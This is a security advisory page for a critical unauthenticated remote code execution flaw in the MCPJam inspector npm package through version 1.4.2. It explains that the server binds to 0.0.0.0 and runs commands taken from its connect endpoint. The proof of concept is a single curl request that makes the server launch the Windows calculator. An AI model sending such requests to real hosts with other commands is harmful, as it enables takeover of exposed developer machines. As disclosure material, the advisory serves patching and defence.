GHSA-232v-j27c-5pp6

Suggest an improvement
Source
https://github.com/advisories/GHSA-232v-j27c-5pp6
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-232v-j27c-5pp6/GHSA-232v-j27c-5pp6.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-232v-j27c-5pp6
Aliases
Published
2026-01-16T21:15:35Z
Modified
2026-02-03T03:10:20.980844Z
Severity
  • 9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
Summary
REC in MCPJam inspector due to HTTP Endpoint exposes
Details

Summary

MCPJam inspector is the local-first development platform for MCP servers. The Latest version Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE.

This vulnerability is similar to CVE-2025-49596, but more severe. While CVE-2025-49596 requires tricking a user into clicking a malicious link, this vulnerability is exploitable with no user interaction. Since MCPJam inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request.

Details

MCPJam inspector binds to 0.0.0.0 making its HTTP APIs remotely reachable.

const server = serve({
  fetch: app.fetch,
  port: SERVER_PORT,
  hostname: "0.0.0.0",
});

The /api/mcp/connect API, which is intended for connecting to MCP servers, becomes an open entry point for unauthorized requests. When an HTTP request reaches the /connect route, the system extracts the command and args fields without performing any security checks, leading to the execution of arbitrary command.

PoC

(1) Start up the MCPJam inspector as Github README npx @mcpjam/inspector@latest

(2) RCE by posting a HTTP request A remote code execution (RCE) attack can be triggered by sending a simple HTTP request to the target host running MCPJam inspector (e.g., http://10.97.58.83:6274 in the test environment). curl http://10.97.58.83:6274/api/mcp/connect --header "Content-Type: application/json" --data "{\"serverConfig\":{\"command\":\"cmd.exe\",\"args\":[\"/c\", \"calc\"],\"env\":{}},\"serverId\":\"mytest\"}"

<img width="1669" height="1397" alt="image" src="https://github.com/user-attachments/assets/cb6505f1-3cdd-4c64-8f39-a01619a63411" />

Impact

Remote Code Execution (RCE)

Database specific
{
    "severity": "CRITICAL",
    "cwe_ids": [
        "CWE-306"
    ],
    "github_reviewed_at": "2026-01-16T21:15:35Z",
    "github_reviewed": true,
    "nvd_published_at": "2026-01-16T20:15:51Z"
}
References

Affected packages

npm / @mcpjam/inspector

Package

Name
@mcpjam/inspector
View open source insights on deps.dev
Purl
pkg:npm/%40mcpjam/inspector

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.4.3

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/01/GHSA-232v-j27c-5pp6/GHSA-232v-j27c-5pp6.json"
last_known_affected_version_range
"<= 1.4.2"